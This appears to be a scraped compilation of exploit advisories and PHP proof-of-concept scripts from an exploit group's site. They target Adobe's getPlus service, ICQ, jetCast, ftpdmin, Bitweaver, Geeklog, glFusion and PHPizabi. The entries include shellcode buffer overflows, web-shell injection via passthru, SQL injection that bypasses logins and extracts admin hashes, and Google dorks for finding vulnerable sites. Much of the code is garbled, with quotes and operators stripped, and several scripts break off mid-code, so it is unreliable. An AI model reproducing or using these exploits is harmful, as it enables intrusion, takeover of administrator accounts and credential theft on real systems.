Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges by Nine:Situations:Group description: Adobe downloader used to download updates for Adobe applications. Shipped with Acrobat Reader 9.x vendor: Nos Microsystems poc: C:\sc qc getPlus(R) Helper [SC] GetServiceConfig SUCCESS SERVICE_NAME: getPlus(R) Helper TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe LOAD_ORDER_GROUP : TAG: 0 DISPLAY_NAME : getPlus(R) Helper DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem C:\cacls C:\Programmi\NOS\bin\getPlus_HelperSvc.exe C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F -- [!!!] NT AUTHORITY\SYSTEM:F The executable files is installed with improper permissions, with full control for Builtin Users; a simple user can replace it with a binary of choice. At the next reboot it will run with SYSTEM privileges. original url: http://retrogod.altervista.org/9sg_adobe_local.html
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc
?php /* ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ If the resulting file is placed on the desktop, against ex. xp sp3 process explorer.exe will exit with code 1282 (0x502) that is ERROR_STACK_BUFFER_OVERRUN and crash infinitely, you cannot even browse a folder if the file is present in it Solution: disable the shell extension, you may try shellexview by nirsoft Note (added 30/05/2009, remote vector added): it works with network folders too ... against a win2k3 where explorer.exe is not patched with /GS flag: (f44.104): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi= eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 SHLWAPI!Ordinal400+0x2d: 772a533f 668906 mov word ptr [esi],axds:0023:00610061= - 0:010 g (f44.104): Access violation - code c005 (!!! second chance !!!) eax=02100068 ebx=772a23c1 ecx=0210cefa edx=0823 esi=00610061 edi= eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010202 SHLWAPI!Ordinal400+0x2d: 772a533f 668906 mov word ptr [esi],axds:0023:00610061= - 0:010 gn eax=0001 ebx= ecx= edx= esi= edi=0001 eip=7ffe0304 esp=0178fcf0 ebp=0178ff44 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0246 SharedUserData!SystemCallStub+0x4: 7ffe0304 c3 ret prepare a network folder with the .url file inside. This works against Internet Explorer too by a hyperlink to the network folder */ $x = [InternetShortcut]\x0d\x0a. URL=.str_repeat(\x61,2184); file_put_contents(9sg_poc.url,$x); ? #original url: http://retrogod.altervista.org/9sg_icq_dos.html
COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overlow exploit
?php /* COWON America jetCast 2.0.4.1109 (.mp3) local heap buffer overlow exploit (xp/sp3) by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ software site: http://www.jetaudio.com/ Tested against JetAudio pack v.7.5.2 - Passing an overlong string as id3 tag we have: (370.7a8): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=0394 ecx=41414141 edx=00160608 esi=010c1a00 edi=0302fbc8 eip=00486db7 esp=0302fb14 ebp=0302fe7c iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010212 jetCast+0x86db7: 00486db7 8b11mov edx,dword ptr [ecx] ds:0023:41414141= code: 00486DB7 |. 8B11 MOV EDX,DWORD PTR DS:[ECX] ---crash 00486DB9 |. 8B8D ACFC MOV ECX,DWORD PTR SS:[EBP-354] 00486DBF |. FF52 0CCALL DWORD PTR DS:[EDX+C] ... - We have 4 bytes of ecx to redirect the program to edi, which keeps our buffer. To do that first we set ecx to a portion of memory which *always* (or nearly) keeps the filename. Look 0x0105... no null char allowed, so I will use 0x01050101 to hit the right offset. To build it we need an address which points to a known call edi, compatible with windows filenames. To achieve that you may do so: x...@pyro ~/framework-2.2/tools $ memdump (pid) jetcast x...@pyro ~/framework-2.2/tools $ cd .. x...@pyro ~/framework-2.2/ $ msfpescan -d ./tools/jetcast/ -j edi 0x7d03388b call edi ... x...@pyro ~/framework-2.2/tools $ msfpescan -d ./tools/jetcast/ -x \x8b\x38\x03\x7d 0x028997c4 8b38037d 0x77e062f5 8b38037d ... then subtract c. Repeat this for each call edi, took me some time to find every combination by a script and I finally found a good one in the MSVCRT.DLL given with the program; a third match seems not possible. Note: first bytes of EDI keep some null chars, but as you can see, this portion is nop-equivalent: 0348FBC8 ADD BYTE PTR DS:[EAX],AL 0348FBCA ADD BYTE PTR DS:[EAX],AL 0348FBCC ADD BYTE PTR DS:[EAX],AL 0348FBCE ADD BYTE PTR DS:[EAX],AL 0348FBD0 90 NOP 0348FBD1 90 NOP 0348FBD2 90 NOP ... Usage: php 9sg_jetcast_poc.php It creates 4 files on your desktop, it says which will hit the right offset on your system (file path is important to achieve arbitrary code execution on a victim user so an attacker should persuade him to try to stream them ...) It works by dragging the file on it or by right clicking and selecting Add files ..., not 100% reliable, version specific... - */ error_reporting(0); if (php_sapi_name() cli) { die([!] Launch from the cli!); } $scode = \xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53. \xbb\x0d\x25\x86\x7c. //WinExec, 0x7c86250d \xff\xd3\x31\xc0\x50. \xbb\x12\xcb\x81\x7c. //ExitProcess, 0x7c81cb12 \xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65. \x78\x65\x20\x2f\x63\x20. cmd /c calc . \xff; if (strlen($scode) 118) { die([!] Shellcode too large here!); } $BOOM = \x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00. str_repeat(\x90, 0x7c).//nop, very reusable \xeb\x06\x90\x90. //jmp short //\x01\x01\x06\x01. //less usually in this location... \x01\x01\x05\x01. //eax - ecx, this works 80% of the times \x90\x90\x90\x90. //nop $scode. str_repeat(A, 0x01f0 - strlen($scode)). \x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f. \x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00.
Bitweaver = 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit
?php /* Bitweaver = 2.6 /boards/boards_rss.php / saveFeed() remote code execution exploit by Nine:Situations:Group::bookoo php.ini independent site: http://retrogod.altervista.org/ software site: http://www.bitweaver.org/ You need an user account and you need to change your display name in: {php}passthru($_SERVER[HTTP_CMD]);{/php} Register and click on Preferences, look at the User Information tab, inside the Real name text field write the code above, then click on Change. Google dorks: by bitweaver Version powered +boards You are running bitweaver in TEST mode|bitweaver * White Screen of Death Versions tested: 2.6.0, 2.0.2 Vulnerability type: folder creation, file creation, file overwrite, PHP code injection. Explaination: look at /boards/boards_rss.php, line 102: ... echo $rss-saveFeed( $rss_version_name, $cacheFile ); ... it calls saveFeed() function in an insecure way, arguments are built on $_REQUEST[version] var and may contain directory traversal sequences... now look at saveFeed() function in /rss/feedcreator.class.php ... function saveFeed($filename=, $displayContents=true) { if ($filename==) { $filename = $this-_generateFilename(); } if ( !is_dir( dirname( $filename ))) { mkdir_p( dirname( $filename )); } $feedFile = fopen($filename, w+); if ($feedFile) { fputs($feedFile,$this-createFeed()); fclose($feedFile); if ($displayContents) { $this-_redirect($filename); } } else { echo br /bError creating feed file, please check write permissions./bbr /; } } } ... regardless of php.ini settings, you can create arbitrary folders, create/overwrite files, also you can end the path with an arbitrary extension, other than .xml passing a null char. ex. http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo.php%00 now you have a bookoo.php in main folder: ?xml version=1.0 encoding=UTF-8? !-- generator=FeedCreator 1.7.2 -- ?xml-stylesheet href=http://www.w3.org/2000/08/w3c-synd/style.css; type=text/css? rss version=0.91 channel title Feed/title description/description linkhttp://192.168.0.1/link lastBuildDateSat, 09 May 2009 20:01:44 +0100/lastBuildDate generatorFeedCreator 1.7.2/generator languageen-us/language /channel /rss You could inject php code by the Host header (but this is used to build filenames and create problems, also most of servers will respond with an http error) inside link tag or by your display name in title tag, ex.: http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../bookoo_ii.php%00u=bookoop=password and here it is the new file (if your display name is ?php passthru($_GET[cmd]; ?): ?xml version=1.0 encoding=UTF-8? !-- generator=FeedCreator 1.7.2 -- ?xml-stylesheet href=http://www.w3.org/2000/08/w3c-synd/style.css; type=text/css? rss version=0.91 channel title Feed (?php passthru($_GET[cmd]; ?))/title description/description linkhttp://192.168.0.1/link lastBuildDateTue, 12 May 2009 00:30:54 +0100/lastBuildDate generatorFeedCreator 1.7.2/generator languageen-us/language /channel /rss if short_open_tag in php.ini is off (because of ?xml ... preamble generating a parse error with short_open_tag = on), you can now launch commands: http://host/path_to_bitweaver/bookoo_ii.php?cmd=ls However, to bypass short_open_tag = on you can inject in a template file, ex.: http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../themes/templates/footer_inc.tpl%00u=bookoop=password Now footer_inc.tpl looks like this: ?xml version=1.0 encoding=UTF-8? !-- generator=FeedCreator 1.7.2 -- ?xml-stylesheet href=http://www.w3.org/2000/08/w3c-synd/style.css; type=text/css? rss version=0.91 channel title Feed ({php}passthru($_GET[CMD]);{/php})/title description/description linkhttp://192.168.0.1/link lastBuildDateTue, 12 May 2009 00:43:01 +0100/lastBuildDate generatorFeedCreator 1.7.2/generator languageen-us/language /channel /rss note that the shellcode is in Smarty template syntax ... Now you can launch commands from the main page: http://host/path_to_bitweaver/index.php?cmd=ls%20-la or http://host/path_to_bitweaver/wiki/index.php?cmd=ls%20-la Additional notes: Without to have an account you can create a denial of service condition, ex. by replacing the main index.php: http://host/path_to_bitweaver/boards/boards_rss.php?version=/../../../../index.php%00 I found also a bug in Smarty template system,
Geeklog = 1.5.2 savepreferences()/*blocks[] remote sql injection exploit
?php /* Geeklog = 1.5.2 savepreferences()/*blocks[] remote sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ PHP and MySQL version independent vulnerability, see usersettings.php near lines 1467 - 1480: ... if (isset ($_USER['uid']) ($_USER['uid'] 1)) { switch ($mode) { case 'saveuser': savepreferences ($_POST); $display .= saveuser($_POST); PLG_profileExtrasSave (); break; case 'savepreferences': savepreferences ($_POST); $display .= COM_refresh ($_CONF['site_url'] . '/usersettings.php?mode=preferencesamp;msg=6'); break; ... all the $_POST[] variables are passed to the savepreferences() function now look the function always in usersettings.php: ... function savepreferences($A) { global $_CONF, $_TABLES, $_USER; if (isset ($A['noicons']) ($A['noicons'] == 'on')) { $A['noicons'] = 1; } else { $A['noicons'] = 0; } if (isset ($A['willing']) ($A['willing'] == 'on')) { $A['willing'] = 1; } else { $A['willing'] = 0; } if (isset ($A['noboxes']) ($A['noboxes'] == 'on')) { $A['noboxes'] = 1; } else { $A['noboxes'] = 0; } if (isset ($A['emailfromadmin']) ($A['emailfromadmin'] == 'on')) { $A['emailfromadmin'] = 1; } else { $A['emailfromadmin'] = 0; } if (isset ($A['emailfromuser']) ($A['emailfromuser'] == 'on')) { $A['emailfromuser'] = 1; } else { $A['emailfromuser'] = 0; } if (isset ($A['showonline']) ($A['showonline'] == 'on')) { $A['showonline'] = 1; } else { $A['showonline'] = 0; } $A['maxstories'] = COM_applyFilter ($A['maxstories'], true); if (empty ($A['maxstories'])) { $A['maxstories'] = 0; } else if ($A['maxstories'] 0) { if ($A['maxstories'] $_CONF['minnews']) { $A['maxstories'] = $_CONF['minnews']; } } $TIDS = @array_values($A[$_TABLES['topics']]); $AIDS = @array_values($A['selauthors']); $BOXES = @array_values($A[{$_TABLES['blocks']}]); //- this is $_POST[(prefix)blocks] $ETIDS = @array_values($A['etids']); $tids = ''; if (sizeof ($TIDS) 0) { $tids = addslashes (implode (' ', $TIDS)); } $aids = ''; if (sizeof ($AIDS) 0) { $aids = addslashes (implode (' ', $AIDS)); } $selectedblocks = ''; if (count ($BOXES) 0) { $boxes = addslashes (implode (',', $BOXES)); //-- this addslashes() is totally unuseful // SQL INJECTION HERE *** $boxes is not surrounded by quotes! $blockresult = DB_query(SELECT bid,name FROM {$_TABLES['blocks']} WHERE bid NOT IN ($boxes)); $numRows = DB_numRows($blockresult); for ($x = 1; $x = $numRows; $x++) { $row = DB_fetchArray ($blockresult); if ($row['name'] 'user_block' AND $row['name'] 'admin_block' AND $row['name'] 'section_block') { $selectedblocks .= $row['bid']; if ($x $numRows) { $selectedblocks .= ' '; } } } } ... read the lines commented! This tool extracts the admin hash from db by asking true/false questions to MySQL and interpreting some checkboxes in response, but requires a simple user account. vulnerability ii, information disclosure: now I see that table prefix is showed inside html because they used table names for the $_TABLES[] array */ $err[0] = [!] This script is intended to be launched from the cli!; $err[1] = [!] You need the curl extesion loaded!; if (php_sapi_name() cli) { die($err[0]); } if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl(php_curl.dll) ? die($err[1]) : nil; } else { !dl(php_curl.so) ? die($err[1]) : nil; } } function syntax() { print ( Syntax: php .$argv[0]. [host] [path] [user] [pass] [OPTIONS] \n. Options: \n. --c:[uid:hash] - use your user cookie, instead of uses/pwd pair \n. --port:[port] - specify a port \n. default-80 \n. --uid:[n] - specify an uid other than default (2,usually admin)\n. --proxy:[host:port] - use proxy \n. --skiptest - skip preliminary tests \n. --test - run only tests \n. Examples: php .$argv[0]. 192.168.0.1 /geeklog/ bookoo pass \n. php .$argv[0]. 192.168.0.1 / bookoo pass --proxy:1.1.1.1:8080\n. php .$argv[0].
ftpdmin v. 0.96 RNFR remote buffer overflow exploit
?php /* ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study) by Nine:Situations:Group::surfista software site: http://www.sentex.net/~mwandel/ftpdmin/ our site: http://retrogod.altervista.org/ bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite. We can use 272 bytes before EIP and 119 after EIP, ESP and EBP points to the second memory region. We have a very small set of chars that we can use ,RNFR (Rename From) command accept pathnames as argument, so characters whose integer representations are in the range from zero through 31 and reserved chars are not allowed! */ error_reporting(7); $ftp_server = 192.168.0.1; $ftp_user = anonymous; $ftp_pass = a...@email.com; function ftp_cmd($cmd){ global $conn_id; echo - .$cmd.\n; $buff=ftp_raw($conn_id,$cmd); } #WinExec shellcode of mine, enconded with the alpha2 tool by SkyLined, adds #a surfista admin user with pass pass #contains hardcoded address, re-encode command: #alpha2 esp shdmp.txt $scode=TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI. Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5. prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN. w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw. 4gPqcpupr3VQybSrTE1kOA; #do not touch, esp adjustment and subsequent call esp, very large but we have lots of unused space $code =TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI. NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA; if (strlen($scode) 272) {die([!] shellcode too large!);} $conn_id = ftp_connect($ftp_server) or die((!) Unable to connect to $ftp_server); if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) { echo (*) Connected as $ftp_u...@$ftp_server\n; } else { die((!) Unable to connect as $ftp_user\n); } $jnk = str_repeat(\x66,272 - strlen($scode)); $eip=\x44\x3a\x41\x7e; //0x7E413A44 jmp esp, user32.dll xp sp3 $jnk_ii = str_repeat(\x66,119 - strlen($code)); $bof=$scode.$jnk.$eip.$code.$jnk_ii; $boom=RNFR .str_repeat(x,0x0096); ftp_cmd($boom); $boom=RNFR .$bof; ftp_cmd($boom); $boom=RNFR .str_repeat(x,0x0208); ftp_cmd($boom); ftp_close($conn_id); echo (*) Done !\n; ? url: http://retrogod.altervista.org/9sg_ftpdmin_096_rnfr_bof.html
Geeklog =1.5.2 'SESS_updateSessionTime()' vulnerability
As the vendor stated, see: http://www.geeklog.net/article.php/geeklog-1.5.2sr2 geeklog is also vulnerable to this: http://www.securityfocus.com/bid/34361/info actually this should be renamed in glFusion 'SESS_updateSessionTime()' SQL Injection Vulnerability
Geeklog =1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit
?php /* Geeklog =1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.geeklog.net/ credit goes to rgod, bug found more than a year ago working against PHP = 5.0 google dorks: By Geeklog Created this page in +seconds +powered By Geeklog Created this page in +seconds +powered inurl:public_html vulnerability, see /public_html/webservices/atom/index.php near lines 34-53: ... require_once '../../lib-common.php'; if (PHP_VERSION 5) { $_CONF['disable_webservices'] = true; } else { require_once $_CONF['path_system'] . '/lib-webservices.php'; } if ($_CONF['disable_webservices']) { COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found'); } header('Content-type: ' . 'application/atom+xml' . '; charset=UTF-8'); WS_authenticate(); ... now WS_authenticate() function in /system/lib-webservices.php near lines 780-877: ... function WS_authenticate() { global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE; $uid = ''; $username = ''; $password = ''; $status = -1; if (isset($_SERVER['PHP_AUTH_USER'])) { $username = $_SERVER['PHP_AUTH_USER']; $password = $_SERVER['PHP_AUTH_PW']; if ($WS_VERBOSE) { COM_errorLog(WS: Attempting to log in user '$username'); } } elseif (!empty($_SERVER['REMOTE_USER'])) { list($auth_type, $auth_data) = explode(' ', $_SERVER['REMOTE_USER']); list($username, $password) = explode(':', base64_decode($auth_data)); if ($WS_VERBOSE) { COM_errorLog(WS: Attempting to log in user '$username' (via \$_SERVER['REMOTE_USER'])); } } else { if ($WS_VERBOSE) { COM_errorLog(WS: No login given); } } ... and after, near lines 907-909: ... if (($status == -1) $_CONF['user_login_method']['standard']) { $status = SEC_authenticate($username, $password, $uid); } ... now open /system/lib-security.php near lines 695-717: ... function SEC_authenticate($username, $password, $uid) { global $_CONF, $_TABLES, $LANG01; $result = DB_query(SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))); //--- SQL INJECTION HERE $tmp = DB_error(); $nrows = DB_numRows($result); if (($tmp == 0) ($nrows == 1)) { $U = DB_fetchArray($result); $uid = $U['uid']; if ($U['status'] == USER_ACCOUNT_DISABLED) { // banned, jump to here to save an md5 calc. return USER_ACCOUNT_DISABLED; } elseif ($U['passwd'] != SEC_encryptPassword($password)) { return -1; // failed login } elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) { return USER_ACCOUNT_AWAITING_APPROVAL; } elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) { // Awaiting user activation, activate: DB_change($_TABLES['users'], 'status', USER_ACCOUNT_ACTIVE, 'username', $username); return USER_ACCOUNT_ACTIVE; } else { return $U['status']; // just return their status } } else { $tmp = $LANG01[32] . : ' . $username . '; COM_errorLog($tmp, 1); return -1; } } ... you can inject sql code in the 'username' argument of this function, it may come from $_SERVER['PHP_AUTH_USER'] or $_SERVER['REMOTE_USER'] php variables. Theese vars are used for both HTTP Basic and Digest Authentication methods, see PHP manual: http://www.php.net/manual/en/features.http-auth.php manual poc, visit http://host/path_to_geeklog/webservices/atom/index.php then type: username: ' AND 0 UNION SELECT 3,MD5(''),null,2 FROM gl_users LIMIT 1/* password: authentication mechanism is bypassed! Note that it is passed base64_encode()'d ! Now you have access to some dangerous functions: service_submit_staticpages() service_delete_staticpages() service_get_staticpages() service_getTopicList_staticpages() in /plugins/staticpages/services.inc.php service_submit_story() service_delete_story() service_get_story() service_getTopicList_story() in /system/lib-story.php ex. the service_submit_staticpages() one allows to specify a dangerous sp_php flag in submitting staticpages; if the staticapages.PHP permission is set to true for the staticpage admin (not the default), the page will be
glFusion = 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit
?php /* glFusion = 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.glfusion.org/ google dork: Page created in seconds by glFusion +RSS Found another vector of injection in /private/system/lib-session.php near lines 97-117: ... if (isset ($_COOKIE[$_CONF['cookie_session']])) { $sessid = COM_applyFilter ($_COOKIE[$_CONF['cookie_session']]); if ($_SESS_VERBOSE) { COM_errorLog(got $sessid as the session id from lib-sessions.php,1); } $userid = SESS_getUserIdFromSession($sessid, $_CONF['session_cookie_timeout'], $_SERVER['REMOTE_ADDR'], $_CONF['cookie_ip']); if ($_SESS_VERBOSE) { COM_errorLog(Got $userid as User ID from the session ID,1); } if ($userid 1) { // Check user status $status = SEC_checkUserStatus($userid); if (($status == USER_ACCOUNT_ACTIVE) || ($status == USER_ACCOUNT_AWAITING_ACTIVATION)) { $user_logged_in = 1; SESS_updateSessionTime($sessid, $_CONF['cookie_ip']); ... see SESS_updateSessionTime() function near lines 418-436: ... function SESS_updateSessionTime($sessid, $md5_based=0) { global $_TABLES; $newtime = (string) time(); if ($md5_based == 1) { $sql = UPDATE {$_TABLES['sessions']} SET start_time=$newtime WHERE (md5_sess_id = '$sessid'); } else { $sql = UPDATE {$_TABLES['sessions']} SET start_time=$newtime WHERE (sess_id = $sessid); // SQL INJECTION HERE } $result = DB_query($sql); return 1; } ... if session id is not md5() hashed in general configuration, which is the default you can inject arbitrary SQL statements. Note that the query in SESS_getUserIdFromSession() function: ... if ($md5_based == 1) { $sql = SELECT uid FROM {$_TABLES['sessions']} WHERE . (md5_sess_id = '$sessid') AND (start_time $mintime) AND (remote_ip = '$remote_ip'); } else { $sql = SELECT uid FROM {$_TABLES['sessions']} WHERE . (sess_id = '$sessid') AND (start_time $mintime) AND (remote_ip = '$remote_ip'); } ... compares the supplied sessid value with the sessid value from sessions table which is an integer. Mysql, like php, in comparing them, only considers the first integer values of the supplied string. So the function returns a valid userid and, if you know an existent sessid in table, you can inject queries in cookies, like this: Cookie: glf_session=12345678 [SQL HERE]; glfusion=99; This tool use delays to extract an admin hash from users table, but needs a simple user account; some improvement in find_prefix(); working against MySQL = 5.0.12, where SLEEP() function is availiable or ... if you find another solution for delays, with MySQL = 4.1, which supports SELECT subqueries (BENCHMARK() cannot be used because commas are filtered by COM_applyFilter() function) */ $err[0] = [!] This script is intended to be launched from the cli!; $err[1] = [!] You need the curl extesion loaded!; if (php_sapi_name() cli) { die($err[0]); } if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl(php_curl.dll) ? die($err[1]) : nil; } else { !dl(php_curl.so) ? die($err[1]) : nil; } } function syntax() { print ( Syntax: php .$argv[0]. [host] [path] [user] [pass] [OPTIONS] \n. Options: \n. --port:[port] - specify a port \n. default-80 \n. --prefix- try to extract table prefix from information.schema\n. default-gl_ \n. --uid:[n] - specify an uid other than default (2,usually admin)\n. --proxy:[host:port] - use proxy \n. --verbose - show more informations \n. --skiptest - skip preliminary tests \n. --test - run only tests \n. Examples: php .$argv[0]. 192.168.0.1 /glfusion/ bookoo pass \n. php .$argv[0]. 192.168.0. 1 / bookoo pass --prefix --proxy:1.1.1.1:8080\n. php .$argv[0]. 192.168.0.1 / bookoo pass --prefix --uid:3); die(); } error_reporting(E_ALL ^ E_NOTICE); $host = $argv[1]; $path = $argv[2]; $_user = $argv[3]; $_pwd = $argv[4]; $prefix = gl_;
glFusion = 1.1.2 COM_applyFilter()/order sql injection exploit
?php /* glFusion = 1.1.2 COM_applyFilter()/order sql injection exploit by Nine:Situations:Group::bookoo working against Mysql = 4.1 php.ini independent our site: http://retrogod.altervista.org/ software site: http://www.glfusion.org/ google dork: Page created in seconds by glFusion +RSS Vulnerability, sql injection in 'order' and 'direction' arguments: look ExecuteQueries() function in /private/system/classes/listfactory.class.php, near line 336: ... // Get the details for sorting the list $this-_sort_arr['field'] = isset($_REQUEST['order']) ? COM_applyFilter($_REQUEST['order']) : $this-_def_sort_arr['field']; $this-_sort_arr['direction'] = isset($_REQUEST['direction']) ? COM_applyFilter($_REQUEST['direction']) : $this-_def_sort_arr['direction']; if (is_numeric($this-_sort_arr['field'])) { $ord = $this-_def_sort_arr['field']; $this-_sort_arr['field'] = SQL_TITLE; } else { $ord = $this-_sort_arr['field']; } $order_sql = ' ORDER BY ' . $ord . ' ' . strtoupper($this-_sort_arr['direction']); ... filters are inefficient, see COM_applyFilter() which calls COM_applyBasicFilter() in /public/lib-common.php near line 5774. We are in an ORDER clause and vars are not surrounded by quotes, bad chars are ex. , , / ,', ;, \,,*,` but what about spaces and (... you can use a CASE WHEN .. THEN .. ELSE .. END construct instead of ex. IF(..,..,..) and -- instead of /* to close your query. And ex. the alternative syntax SUBSTR(str FROM n FOR n) instead of SUBSTR(str,n,n) in a sub-SELECT statement. Other attacks are possible, COM_applyFilter() is a very common used one. Additional notes: 'direction' argument is uppercased by strtoupper(), you know that table identifiers on Unix-like systems are case sensitives but not on MS Windows, however I choosed to inject in the 'order' one for better results. Vars come from the $_REQUEST[] array so you can pass it by $_POST[] or $_COOKIE[], which is not intended I suppose. This exploit extracts the hash from users table; also note that you do not need to crack the hash, you can authenticate as admin with the cookie: glfusion=[uid]; glf_password=[hash]; as admin you can upload php files in public folders! Very soft mitigations: glFusion does not show the table prefix in sql errors, default however is 'gl_'. I prepared a fast routine to extract it from information_schema db if availiable. To successfully interrogate MySQL you need at least 2 records in the same topic section, however the default installation create 2 links with topic glFusion */ $err[0]=[!] This script is intended to be launched from the cli!; $err[1]=[!] You need the curl extesion loaded!; if (php_sapi_name() cli) { die($err[0]); } if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl(php_curl.dll) ? die($err[1]) : nil; } else { !dl(php_curl.so) ? die($err[1]) : nil; } } function syntax(){ print ( Syntax: php .$argv[0]. [host] [path] [[port]] [OPTIONS] \n. Options: \n. --port:[port] - specify a port \n. default - 80 \n. --prefix- try to extract table prefix from information.schema\n. default - gl_ \n. --uid:[n] - specify an uid other than default (2,usually admin)\n. --proxy:[host:port] - use proxy \n. --enforce - try even with 'not vulnerable' message ); die(); } error_reporting(E_ALL ^ E_NOTICE); $host=$argv[1]; $path=$argv[2]; $prefix=gl_; //default $uid=2; $where= uid=$uid; //user id, usually admin, anonymous = 1 $argv[2] ? print([*] Attacking...\n) : syntax(); $_f_prefix=false; $_use_proxy=false; $port=80;
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent) by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.phpizabi.net/ vulnerability: sql injection in /theme/default/proc.inc.php ?php function bufferProcParse($buffer) { global $CONF; $tpl = new template; $tpl - LoadThis($buffer); // HANDLE POSTED NOTEPAD DATA /// if (isset($_GET[notepad_body])) { myQ(UPDATE `[x]users` SET `notepad_body` = '.urldecode($_GET[notepad_body]).' WHERE `id`='.me(id).'); me(flush); } .. note urldecode() ... exploitation, manual: injection urls: change username and password of an existing user: [sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/* which becomes: http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user% 2527/* grant yourself admin rights: [sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/* which becomes: http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=% 20%2527bookoo%2527/* navigate: http://host/path_to_phpizabi/?L=admin.index boom ! now go to: http://host/path_to_phpizabi/?L=admin.cms.editid={cms.file} use this opening and closing tag style, example: script language=php system(ls -la); /script (it is always availiable, see:http://www.php.net/manual/en/language.basic-syntax.phpmode.php) because of that preg_replace() in /modules/admin/cms/edit.php : .. if (isset($_POST[Submit])) { if ($handle = fopen(modules/cms/{$_GET[id]}.php, w)) { $body = ?php if (!defined(\CORE_STRAP\)) die(); ?\n .preg_replace('#(\\?.*\\?)|(%.*%)|\\?php|\\?|\\?|%|%#si', NULL, stripslashes($_POST[body][0])) .\n!-- Edited by .me(username). on .date($CONF[LOCALE_HEADER_DATE_TIME]). --; ; fwrite($handle, $body); fclose($handle); .. which is bypassed. save changes and navigate: http://host/path_to_phpizabi/?L=cms._cms_file_ to see the output... now visit log page: http://192.168.0.1/phpizabi/?L=admin.logs.logs .. original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html
Bs.Player = 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
